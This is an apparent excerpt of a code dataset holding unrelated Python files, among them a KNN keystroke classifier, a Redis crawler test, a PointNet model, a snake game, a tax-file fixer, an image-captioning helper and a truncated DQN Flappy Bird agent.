\"passwordWPS\":[2.63E-03], \"totalTimeSpent\":[7715], \"countShift\":[1],\"countCapslock\":[0],\"countKey\":[23], \"dwellTimeAverage\":[79.73913043], \"flightTimesAverage\":[348], \"upDownTimeAverage\":[205.9047619]})\n\nprint(X_test)\ny_pred = model.predict(X_test)\n\ny_pred_prob = model.predict_proba(X_test)\nprint(y_pred)\nprint(y_pred_prob)\n\nprint(confusion_matrix(y_test,y_pred))\nprint(classification_report(y_test,y_pred))\n\nprint(accuracy_score(y_test,y_pred)*100)\n\nprint(model.predict_proba(new_input))\n\n# precision = precision_score(y_test, y_pred, average='binary')\n# recall = recall_score(y_test, y_pred, average='binary')\n# score = f1_score(y_test, y_pred, average='binary')\n#\n# print('Recall: %.3f' % recall)\n# print('F-Measure: %.3f' % score)\n\n\n\n","sub_path":"MachineLearning/KNearestNeighbour.py","file_name":"KNearestNeighbour.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231843359","text":"import redis\nimport random\nimport hashlib\nimport json\nimport base64\nfrom LengyueRequestsService.redis_packer import Packer\npool = redis.ConnectionPool(host='127.0.0.1', port=6379, db=0)\nr = redis.StrictRedis(connection_pool=pool)\nhelper = Packer()\n\nfor i in range(1000):\n key = hashlib.md5(str(random.random()).encode()).hexdigest()\n task = json.dumps({\n \"task_id\": key,\n \"method\": \"GET\",\n \"url\": \"https://zhihu.com\",\n \"headers\": {\n },\n \"params\": {\n \"ver\": -1\n },\n \"data\": None,\n \"proxy\": None,\n })\n\n r.lpush('crawl:queue', base64.b64encode(task.encode()))\np = r.pubsub()\np.subscribe(\"crawl:finish\")\nn = 0\nwhile True:\n i = p.get_message()\n if i != None:\n if i[\"type\"] == \"message\":\n j = base64.b64decode(r.get(\"crawl:result:\" + i[\"data\"].decode())).decode()\n j = json.loads(j)\n 
print(base64.b64decode(j[\"result\"][\"content\"]).decode())\n n += 1\n print(\"Current Recv\", n)","sub_path":"LRS/tests/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46909486","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport pytorch_utils as pt_utils\nfrom typing import List\n\n\nclass PointNet(nn.Module):\n def __init__(self,*, mlp1:List[int], mlp2:List[int],segmentaion: bool = False, tailmlp:List[int] = None):\n '''\n para mlp: list of int\n para bn: whether to use batchnorm\n '''\n super().__init__()\n self.mlp1 = pt_utils.SharedMLP(mlp1,bn = False)\n self.mlp2 = pt_utils.SharedMLP(mlp2,bn = False)\n self.useforseg = segmentaion\n if segmentaion:\n seg_layers = []\n for k in range(0,tailmlp.__len__()-2):\n seg_layers.append(pt_utils.Conv1d(\n tailmlp[k],\n tailmlp[k+1],\n bn = True\n ))\n seg_layers.append(pt_utils.Conv1d(tailmlp[-2],tailmlp[-1],activation=None))\n self.segmlp = nn.Sequential(*seg_layers)\n else:\n cls_layers = []\n for k in range(0,tailmlp.__len__()-2):\n cls_layers.append(pt_utils.Conv1d(\n tailmlp[k],\n tailmlp[k+1],\n bn = True\n ))\n cls_layers.append(pt_utils.Conv1d(tailmlp[-2],tailmlp[-1],activation=None))\n self.clsmlp = nn.Sequential(*cls_layers)\n\n def forward(self,x):\n n_pts = x.size()[1]\n if self.useforseg:\n x = self.mlp1(x)\n gl_feature = self.mlp2(x)\n gl_feature = torch.max(gl_feature,2,keepdim=True)[0]\n gl_feature = gl_feature.view(-1,1024,1).repeat(1,1,n_pts)\n gl_feature = torch.cat([x,gl_feature],1)\n gl_feature = self.segmlp(gl_feature)\n else:\n x = self.mlp1(x)\n x = self.mlp2(x)\n gl_feature = torch.max(x,2,keepdim=True)[0]\n gl_feature = self.clsmlp(gl_feature)\n\n return gl_feature\n\n\nif __name__ == \"__main__\":\n k = 40\n MLP = [[3,64,64],[64,64,128,1024]]\n\n CLSMLP = [1024,512,256,k]\n\n def getmodel(segmentation: bool = False):\n return PointNet(mlp1 = MLP[0],mlp2 = MLP[1],tailmlp=CLSMLP)\n\n x = torch.rand(8,3,1000)\n model = getmodel()\n y = model(x)\n y = y.view(-1)\n print(y.shape)\n \n\n ","sub_path":"Backup/第五讲思路讲解--王永浩助教/第五讲思路讲解/code_example/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231221908","text":"import pygame, sys, random\n\n\nclass pyton(object):\n\tu'''dodajemy historie miejsc gdzie skrecal i koniec, w kazdym ruchu koniec sie porusza, chyba, ze zjadl\n\t\t\tzdaje sie ze trzeba tylko aktualizowac liste, a nie za kazdym razem przesylac nowa bo nie dziala wtedy\n\t\n\t'''\n\tdef __init__(self, game, colour = (255, 0, 0), direction = 'r'):\n\t\tself.game = game\n\t\tself.colour = colour\n\t\tself.direction = direction\n\t\tself.length = 0\n\t\tself.x = self.game.board_size[0][0]+200\n\t\tself.y = self.game.board_size[0][1]+200\n\t\tself.how_big = 20\n\t\tself.head = [self.x, self.y, direction]\t\n\t\tself.end = [self.x-50, self.y, direction]\n\t\tself.track = []\t\t\t#tablica krotek gdzie skret i w ktora strone\t\t\t\t\t\t\t\t\n\t\tself.to_grow = 0\n\t\tself.list_of_boxes = [((self.end[0],self.end[1]),(self.head[0]+self.how_big,self.head[1]+self.how_big))]\n\t\n\tdef t_up(self):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#jeszcze skrecanie trzeba ogarnac\n\t\tif self.direction == 'r' or self.direction == 'l':\n\t\t\tself.direction = 'u'\n\t\t\tself.track.append((self.x, self.y, 
self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\n\tdef t_down(self):\n\t\tif self.direction == 'r' or self.direction == 'l':\n\t\t\tself.direction = 'd'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\t\n\tdef t_left(self):\n\t\tif self.direction == 'u' or self.direction == 'd':\n\t\t\tself.direction = 'l'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t#!\n\t\t\t\n\tdef t_right(self):\n\t\tif self.direction == 'u' or self.direction == 'd':\n\t\t\tself.direction = 'r'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\t\n\tdef move(self):\n\t\tif self.direction == 'u':\n\t\t\tself.y-=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t\t#!\n\t\telif self.direction == 'd':\n\t\t\tself.y+=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\telif self.direction == 'r':\n\t\t\tself.x+=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\telif self.direction == 'l':\n\t\t\tself.x-=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\tself.head[0]=self.x\n\t\tself.head[1]=self.y\n\t\t\n\t\tif self.to_grow > 0:\t\t\t\t\t\t\t\t\t#czy rozciagnac weza\n\t\t\tself.to_grow-=1\t\t\t\t\t\t\t\t\t\t#jezeli jadl to nie przenosimy konca\n\t\telse:\n\t\t\tif self.end[2] == 'u':\n\t\t\t\tself.end[1]-=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t#!\n\t\t\telif self.end[2] == 'd':\n\t\t\t\tself.end[1]+=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t#!\n\t\t\telif self.end[2] == 'r':\n\t\t\t\tself.end[0]+=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t\t#!\n\t\t\telif self.end[2] == 'l':\n\t\t\t\tself.end[0]-=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t\t#!\n\t\t\t\n\t\t\tif len(self.track)>0:\n\t\t\t\tcel = self.track[0]\n\t\t\t\t'''if self.end[0] == cel[0] and self.end[1] == cel[1]:\n\t\t\t\t\t#print('skret')\n\t\t\t\t\tself.end[2] = cel[2]\t\t\t\t\t\t\t\t\t\t#ponizej rozwiazanie dzialajacce tylko jesli nic innego sie nie popsuje\n\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t'''\t\n\t\t\t\tif self.end[2]=='r':\t\t\t\t\t#przy kazdym takim poleceniu usuwamy ostatni czlon weza\n\t\t\t\t\tif self.end[0] >= cel[0]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\t\t\t\t\n\t\t\t\telif self.end[2]=='l':\n\t\t\t\t\tif self.end[0] <= cel[0]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\t\t\telif self.end[2]=='u':\n\t\t\t\t\tif self.end[1] <= cel[1]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\t\t\telif self.end[2]=='d':\n\t\t\t\t\tif self.end[1] >= cel[1]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\n\t\t\t\t\n\t\tif True:\t\t\n\t\t\t#chwilowo bez przechodzenia, bariery przy scianach\n\t\t\tif self.x < self.game.board_size[0][0]:\n\t\t\t\tself.game.end()\n\t\t\telif self.x > self.game.board_size[1][0]:\n\t\t\t\tself.game.end()\n\t\t\tif self.y < self.game.board_size[0][1]:\n\t\t\t\tself.game.end()\n\t\t\telif 
self.y > self.game.board_size[1][1]:\n\t\t\t\tself.game.end()\n\t\n\t\n\tdef box(self):\n\t\tb = pygame.Rect(self.x,self.y,self.how_big,self.how_big)\n\t\treturn b\n\t\n\tdef list_of_parts(self):\t\t#ma zwrocic liste par punktow lt i rb\n\t\tT = []\t\t\t\t\t\t\t#cos tu nie tak\n\t\tL = self.track\n\t\tL.insert(0,self.end)\n\t\tL.append(self.head)\n\t\tt = len(L)\n\t\tfor i in range(t-1):\n\t\t\tcur_pos = L[i]\n\t\t\tnext_pos = L[i+1]\n\t\t\tif cur_pos[2] == 'r':\n\t\t\t\tT.append(((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'l':\n\t\t\t\tT.append(((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'd':\n\t\t\t\tT.append(((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'u':\n\t\t\t\tT.append(((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big)))\n\n\t\treturn T\n\t\t\n\tdef part(self, i):\n\t\tif i == 0:\n\t\t\tcur_pos = self.end\n\t\t\tif len(self.track) == 0:\n\t\t\t\tnext_pos = self.head\n\t\t\telse:\n\t\t\t\tnext_pos = self.track[0]\n\t\telif i == -2:\n\t\t\tif len(self.track) == 0:\n\t\t\t\tcur_pos = self.end\n\t\t\telse:\t\n\t\t\t\tcur_pos = self.track[-1]\n\t\t\tnext_pos = self.head\n\t\telif i == -3:\n\t\t\tif len(self.track) == 0:\n\t\t\t\tprint(\"nwm cco robic\")\n\t\t\telse:\n\t\t\t\tif len(self.track) == 1:\n\t\t\t\t\tcur_pos = self.end\n\t\t\t\telse:\n\t\t\t\t\tcur_pos = self.track[-2]\n\t\t\t\tnext_pos = self.track[-1]\n\t\telse:\n\t\t\tprint(\"COS NIE TAK\")\n\t\t\n\t\t#L = self.track\n\t\t#L.insert(0,self.end)\n\t\t#L.append(self.head)\t\t#bez sensu\n\t\t#cur_pos = L[i]\n\t\t#next_pos = L[i+1]\n\t\t\n\t\tif cur_pos[2] == 'r':\n\t\t\tT=((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'l':\n\t\t\tT=((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'd':\n\t\t\tT=((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'u':\n\t\t\tT=((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big))\n\t\treturn T\n\t\t\n\tdef eat(self, how_much):\n\t\tself.length+=how_much\n\n\t\n","sub_path":"pyton.py","file_name":"pyton.py","file_ext":"py","file_size_in_byte":6045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412800273","text":"import os\nimport sys\n\nArquivosLista \t\t= os.listdir(os.getcwd())\nprint(ArquivosLista)\nArquivosListatxt \t= []\nindex \t\t\t\t= 0\n\nfor Arquivo in ArquivosLista:\n if str(Arquivo).upper().endswith('.TXT'):\n print(str(index) + '\\t' + Arquivo)\n ArquivosListatxt.append(Arquivo)\n index += 1\n\nindiceArq = input('Selecione o arquivo a ser processado:')\n\nprint(ArquivosListatxt[int(indiceArq)])\n\nNomeArquivo = str(ArquivosListatxt[int(indiceArq)])\nArquivoEdoc = open(NomeArquivo, 'r')\nArquivoLinhas = ArquivoEdoc.readlines()\n\nLinhasC600 \t = []\nnrolinha = 0\nNovoArquivo = open('NovoArquivo.txt','w')\nValorC610 = 0\nUltimoC600 = 0\nfor linha in ArquivoLinhas:\n\tlinhaSplit = linha.split('|')[1]\n\tregistro = linhaSplit[1]\n\tif registro == 'C600':\n\t\tLinhaNvC600 = LinhasC600[UltimoC600][1].split('|')\n\t\tLinhaNvC600[22] = str(ValorC610).replace('.',',')\n\n\t\tLinhasC600[UltimoC600][1] = '|'.join(LinhaNvC600)\n\n\t\tUltimoC600 = nrolinha\n\t\tValorC610 = 0\n\n\tif registro == 'C610':\n\t\tValorC610 += 
float(str(linhaSplit[17]).replace(',','.'))\n\n\tvetor = [registro, linha]\n\tnrolinha += 1\n\tLinhasC600.append(vetor)\n\nfor LinhaNova in LinhasC600:\n\tNovoArquivo.write(LinhaNova[1])\n\nNovoArquivo.close()\nArquivoEdoc.close()","sub_path":"PythonDev/Testes_desenvolvimento/edoc/ArrumaC600Edoc.py","file_name":"ArrumaC600Edoc.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551134817","text":"import structsvm as ssvm\nimport unittest\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass TestBundleMethod(unittest.TestCase):\n\n    def test_quadratic(self):\n\n        # f(x) = (x - 1)**2\n        def value_gradient(x):\n            return (x[0] - 1.0)**2, 2*(x - 1)\n\n        bundle_method = ssvm.BundleMethod(\n            value_gradient,\n            dims=1,\n            regularizer_weight=0.0001,\n            eps=1e-5)\n\n        w = bundle_method.optimize(max_iterations=100)\n        self.assertAlmostEqual(w[0], 0.99897, places=4)\n","sub_path":"structsvm/tests/test_bundle_method.py","file_name":"test_bundle_method.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"396952563","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author : Li Haozheng\n# @Time : 2019/3/22 16:26\n\n# Mode (GrayMode, ColorMode, MosaicMode)\nMODEL = 'GrayMode' # GrayMode or ColorMode or MosaicMode\n\n# Picture path; an http URL also works\nPICTURE_PATH = r'demo/demo.jpg' # Set local picture or internet picture.\n\n# Output path\nOUTPUT_PATH = 'demo/grayMode.js'\n\n# Picture height (number of characters); width is only used if the output picture is distorted\nHEIGHT = 30\n# WIDTH =\n# WIDTH is not necessary.\n\n# Fill character for MosaicMode and ColorMode; may be a single character ('#' recommended) or Chinese characters or digits, but Chinese must not be mixed with letters or digits\nColorModeChar = 'EMIYA' # Don't set '%' ! Recommend character: '#', '@', '&'.\n\n# Output font size\nColorModeFontSize = 12 # minimum size is 10, default size is 12\n\n# Background colour (GrayMode or ColorMode only)\nBackgroundColor = '#ffffff'","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79373562","text":"import requests\n# If you are using a Jupyter notebook, uncomment the following line.\n#%matplotlib inline\n# import matplotlib.pyplot as plt\nfrom PIL import Image\nfrom io import BytesIO\nimport os\nimport sys\nimport urllib.request\nimport json\nimport ast\n\nwith open('vvvp/metadata/keys.json') as f:\n    js = f.read()\n    keys = ast.literal_eval(js)\n\ndef vision_im2txt(img):\n    api_key = keys['vision_api']\n    assert api_key\n    vision_base_url = \"https://koreacentral.api.cognitive.microsoft.com/vision/v1.0/analyze\"\n    image_data = img\n    #image_path = 'c:/surround_system_pro/vvvp/alone.jpg'\n    #image_data = open(image_path, \"rb\").read()\n    params = {'visualFeatures': 'Categories,Description,Color'}\n    headers = {'Ocp-Apim-Subscription-Key': api_key,'Content-Type': 'application/octet-stream'}\n    response = requests.post(vision_base_url, headers=headers,params=params, data=image_data)\n    # response.raise_for_status()\n\n    res = json.loads(response.text)\n    # print(str(res) + '------------------------' , flush=True)\n\n    result = res['description']['captions'][0]['text']\n    return result\n\ndef translate(result):\n\n    client_id = keys['papago_api'][0]['id']\n    client_secret = keys['papago_api'][0]['secret']\n\n    encText = urllib.parse.quote(result)\n    data = \"source=en&target=ko&text=\" + encText\n    url = \"https://openapi.naver.com/v1/papago/n2mt\"\n    request = 
urllib.request.Request(url)\n\n    request.add_header(\"X-Naver-Client-Id\",client_id)\n    request.add_header(\"X-Naver-Client-Secret\",client_secret)\n    response = urllib.request.urlopen(request, data=data.encode(\"utf-8\"))\n\n    rescode = response.getcode()\n    if rescode == 200:\n        response_body = response.read()\n        response_json = json.loads(response_body.decode('utf-8'))\n        print(response_json['message']['result']['translatedText'])\n        text = response_json['message']['result']['translatedText']\n        return text\n    else:\n        print(\"Error Code:\" + str(rescode))\n","sub_path":"vvvp/analyze_image.py","file_name":"analyze_image.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580893289","text":"infile = open('.input.dat', 'r')\nfor line in infile:\n    # Typical line: variable = value\n    variable, value = line.split('=')\n    variable = variable.strip() # remove leading/trailing blanks\n    if variable == 'v0':\n        v0 = float(value)\n    elif variable == 'a':\n        a = float(value)\n    elif variable == 'dt':\n        dt = float(value)\n    elif variable == 'interval':\n        interval = eval(value)\ninfile.close()\n\nt_values = []\ns_values = []\nn = int(round(interval[1]/dt)) + 1 # No of t values\nfor i in range(n):\n    t = i*dt\n    s = v0*t + 0.5*a*t**2\n    t_values.append(t)\n    s_values.append(s)\n\n# Write nicely formatted table to file\noutfile = open('table1.dat', 'w')\noutfile.write('# t s(t)\\n') # write table header\nfor t, s in zip(t_values, s_values):\n    outfile.write('%.2f %.4f\\n' % (t, s))\n\n# Alternative: use numpy.savetxt\nimport numpy as np\n# Make two-dimensional array of [t, s(t)] values in each row\ndata = np.array([t_values, s_values]).transpose()\n\n# Write data array to file in table format\nnp.savetxt('table2.dat', data, fmt=['%.2f', '%.4f'],\n           header='t s(t)', comments='# ')\n\n# Read the file back\ndata = np.loadtxt('table2.dat', comments='#')\n","sub_path":"doc/src/src-bumpy/for_file_read_input.py","file_name":"for_file_read_input.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"230656095","text":"'''\nInput: [1,2,3]\nOutput: [1,2,4]\nExplanation: the array represents the number 123.\n\nInput: [4,3,2,1]\nOutput: [4,3,2,2]\nExplanation: the array represents the number 4321.\n\n\nThe carry must be handled: check whether the last digit is 9; if it is, keep checking the previous digit in the same way.\nThis can be done by stripping the last digit and repeating the check on the rest of the array (here via recursion).\n'''\n\ndef plusOne(d):\n\tif len(d) == 0:\n\t\treturn [1]\n\telif d[-1] == 9:\n\t\td = plusOne(d[:-1])\n\t\td.extend([0])\n\telse:\n\t\td[-1] += 1\n\treturn d\n\nprint(plusOne([4,3,1,5,7,8,9]))","sub_path":"LeetCode/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14760507","text":"#!/usr/bin/env python\r\nfrom __future__ import print_function # new-style print function\r\n\r\nimport tensorflow as tf\r\nimport cv2\r\nimport sys\r\nsys.path.append(\"game/\")\r\nimport wrapped_flappy_bird as game\r\nimport random\r\nimport numpy as np\r\nfrom collections import deque # double-ended queue\r\n\r\n# Parameters\r\nGAME = 'bird' # name of the game\r\nACTIONS = 2 # kinds of actions: up or down\r\nGAMMA = 0.99 # Q-learning decay rate\r\nOBSERVE = 100. # number of samples in the experience replay pool\r\nEXPLORE = 200000. 
# frames over which to anneal epsilon\r\nFINAL_EPSILON = 0.001 # 结束探索时候的选择动作的ε概率\r\nINITIAL_EPSILON = 0.01 # 开始探索时候的选择动作的ε概率\r\nREPLAY_MEMORY = 50000 # 经验池的最大内存\r\nBATCH = 32 # 随机抽样的样本数\r\nFRAME_PER_ACTION = 1\r\nUPDATE_TIME = 100 #更新目标网络\r\n\r\n\r\nclass DQN_NATURE:\r\n\r\n\tdef __init__(self):\r\n\t\t# 初始化经验池\r\n\t\tself.memory = deque()\r\n\t\t# 初始化步数 检测模型保存和EPSILION的改变\r\n\t\tself.timeStep = 0\r\n\t\tself.epsilon = INITIAL_EPSILON\r\n\t\t\r\n\t\t# 初始化当前Q网络\r\n\t\tself.stateInput,self.QValue,self.W_conv1,self.b_conv1,self.W_conv2,self.b_conv2,self.W_conv3,self.b_conv3,self.W_fc1,self.b_fc1,self.W_fc2,self.b_fc2 = self.createNetwork()\r\n\t\t# 初始化目标Q网络\r\n\t\tself.stateInputT,self.QValueT,self.W_conv1T,self.b_conv1T,self.W_conv2T,self.b_conv2T,self.W_conv3T,self.b_conv3T,self.W_fc1T,self.b_fc1T,self.W_fc2T,self.b_fc2T = self.createNetwork()\r\n\t\t#将当前Q网络赋值给目标Q网络 tf.assign为赋值操作\r\n\t\tself.copyTargetQNetworkOperation = [self.W_conv1T.assign(self.W_conv1),self.b_conv1T.assign(self.b_conv1),self.W_conv2T.assign(self.W_conv2),self.b_conv2T.assign(self.b_conv2),self.W_conv3T.assign(self.W_conv3),self.b_conv3T.assign(self.b_conv3),self.W_fc1T.assign(self.W_fc1),self.b_fc1T.assign(self.b_fc1),self.W_fc2T.assign(self.W_fc2),self.b_fc2T.assign(self.b_fc2)]\r\n\t\t#初始化损失函数\r\n\t\tself.createTrainingMethod()\r\n\t\t\r\n\t\t# 保存和加载网络模型\r\n\t\t# TensorFlow采用Saver来保存。一般在Session()建立之前,通过tf.train.Saver()获取Saver��例\r\n\t\tself.saver = tf.train.Saver()\r\n\t\tself.sess = tf.InteractiveSession()\r\n\t\tself.sess.run(tf.initialize_all_variables())\r\n\t\t#如果检查点存在就载入已经有的模型\r\n\t\tcheckpoint = tf.train.get_checkpoint_state(\"saved_networks\")\r\n\t\tif checkpoint and checkpoint.model_checkpoint_path:\r\n\t\t\tself.saver.restore(sess, checkpoint.model_checkpoint_path)\r\n\t\t\tprint(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\r\n\t\telse:\r\n\t\t\tprint(\"Could not find old network weights\")\r\n\t\t\r\n\t\t\r\n\t# 初始化当前状态\r\n\tdef setInitState(self,observation):\r\n\t\tself.currentState = np.stack((observation, observation, observation, observation), axis = 2)\r\n\r\n # 构建CNN卷积神经网络\r\n # 权重 tf.truncated_normal(shape, mean, stddev):\r\n # shape表示生成张量的维度,mean是均值,stddev是标准差 一个截断的产生正太分布的函数 \r\n # TensorFlow的世界里,变量的定义和初始化是分开的 tf.Variable(initializer,name),initializer是初始化参数,name是可自定义的变量名称\r\n\tdef weight_variable(self, shape):\r\n\t\tinitial = tf.truncated_normal(shape, stddev = 0.01) \r\n\t\treturn tf.Variable(initial)\r\n\r\n # 偏置 TensorFlow创建常量tf.constant\r\n\tdef bias_variable(self, shape):\r\n\t\tinitial = tf.constant(0.01, shape = shape)\r\n\t\treturn tf.Variable(initial)\r\n\r\n\t# 卷积 tf.nn.conv2d(input, filter, strides, padding, use_cudnn_on_gpu=None, name=None)\r\n\t# input -- 卷积输入图像 Tensor [batch, in_height, in_width, in_channels] [训练时一个batch的图片数量, 图片高度, 图片宽度, 图像通道数] \r\n\t# filter -- 卷积核 Tensor [filter_height, filter_width, in_channels, out_channels] [卷积核的高度,卷积核的宽度,图像通道数,卷积核个数] \r\n\t# strides -- 卷积时在图像每一维的步长 步长不为1的情况,文档里说了对于图片,因为只有两维,通常strides取[1,stride,stride,1]\r\n\t#\t padding -- \"SAME\",\"VALID\" SAME: 输出大小等于输入大小除以步长 VALID: 输出大小等于输入大小减去滤波器大小加上1,最后再除以步长 向上取整\r\n\tdef conv2d(self, x, W, stride):\r\n\t\treturn tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\r\n\r\n\t# 池化 tf.nn.max_pool(value, ksize, strides, padding, name=None)\r\n\t# 输入 [batch, height, width, channels] \r\n\t#\t 池化窗口大小 池化窗口的大小,取一个四维向量,一般是[1, height, width, 1],因为我们不想在batch和channels上做池化,所以这两个维度设为了1\r\n\t# 步长 和卷积类似,窗口在每一个维度上滑动的步长,一般也是[1, stride,stride, 1]\r\n\t#\t 填充 \"SAME\",\"VALID\"\r\n\tdef 
\tdef max_pool_2x2(self, x):\r\n\t\treturn tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\r\n\r\n\t# build the CNN model; returns stateInput, QValue and all network parameters\r\n\tdef createNetwork(self):\r\n\t\t# first conv layer, kernel 8*8*4*32\r\n\t\tW_conv1 = self.weight_variable([8, 8, 4, 32])\r\n\t\tb_conv1 = self.bias_variable([32])\r\n\t\t# second conv layer, kernel 4*4*32*64\r\n\t\tW_conv2 = self.weight_variable([4, 4, 32, 64])\r\n\t\tb_conv2 = self.bias_variable([64])\r\n\t\t# third conv layer, kernel 3*3*64*64\r\n\t\tW_conv3 = self.weight_variable([3, 3, 64, 64])\r\n\t\tb_conv3 = self.bias_variable([64])\r\n\t\t# first fully connected layer 1600 -> 512\r\n\t\tW_fc1 = self.weight_variable([1600, 512])\r\n\t\tb_fc1 = self.bias_variable([512])\r\n\t\t# second fully connected layer 512 -> 2\r\n\t\tW_fc2 = self.weight_variable([512, ACTIONS])\r\n\t\tb_fc2 = self.bias_variable([ACTIONS])\r\n\t\t\r\n\t\t# input layer\r\n\t\tstateInput = tf.placeholder(\"float\", [None, 80, 80, 4])\r\n\r\n\t\t# first hidden layer + pooling layer, tf.nn.relu activation 80*80*4 -> 20*20*32 80/4 = 20\r\n\t\th_conv1 = tf.nn.relu(self.conv2d(stateInput, W_conv1, 4) + b_conv1) # 80*80*4 -> 20*20*32 80/4 = 20\r\n\t\th_pool1 = self.max_pool_2x2(h_conv1) # 20*20*32 -> 10*10*32 20/2 = 10\r\n\t\t# second hidden layer (only this one pooling layer is used)\r\n\t\th_conv2 = tf.nn.relu(self.conv2d(h_pool1, W_conv2, 2) + b_conv2) # 10*10*32 -> 5*5*64 10/2 = 5\r\n\t\t# h_pool2 = max_pool_2x2(h_conv2)\r\n\t\t# third hidden layer\r\n\t\th_conv3 = tf.nn.relu(self.conv2d(h_conv2, W_conv3, 1) + b_conv3) # 5*5*64 -> 5*5*64 5/1 = 5\r\n\t\t# h_pool3 = max_pool_2x2(h_conv3)\r\n\t\t# Reshape\r\n\t\t#h_pool3_flat = tf.reshape(h_pool3, [-1, 256])\r\n\t\th_conv3_flat = tf.reshape(h_conv3, [-1, 1600]) # 5*5*64 = 1600 n*1600 --1600\r\n\t\t# fully connected layer\r\n\t\th_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1) # 1600*512 -- 512\r\n\t\t# output layer\r\n\t\t# readout layer: one Q-value per action\r\n\t\tQValue = tf.matmul(h_fc1, W_fc2) + b_fc2 # 512*2 -- 2\r\n\t\t\r\n\t\treturn stateInput,QValue,W_conv1,b_conv1,W_conv2,b_conv2,W_conv3,b_conv3,W_fc1,b_fc1,W_fc2,b_fc2\r\n\t\t\r\n\t# copy the online weights into the target Q-network\r\n\tdef copyTargetQNetwork(self):\r\n\t\tself.sess.run(self.copyTargetQNetworkOperation)\r\n\t\t\r\n\t\t# loss function\r\n\tdef createTrainingMethod(self):\r\n\t\t# actionInput is the one-hot action taken; yInput is the target value. Q_action multiplies QValue\r\n\t\t# by actionInput and sums along axis 1; the loss is the squared difference between target and output\r\n\t\tself.actionInput = tf.placeholder(\"float\", [None, ACTIONS]) # action taken 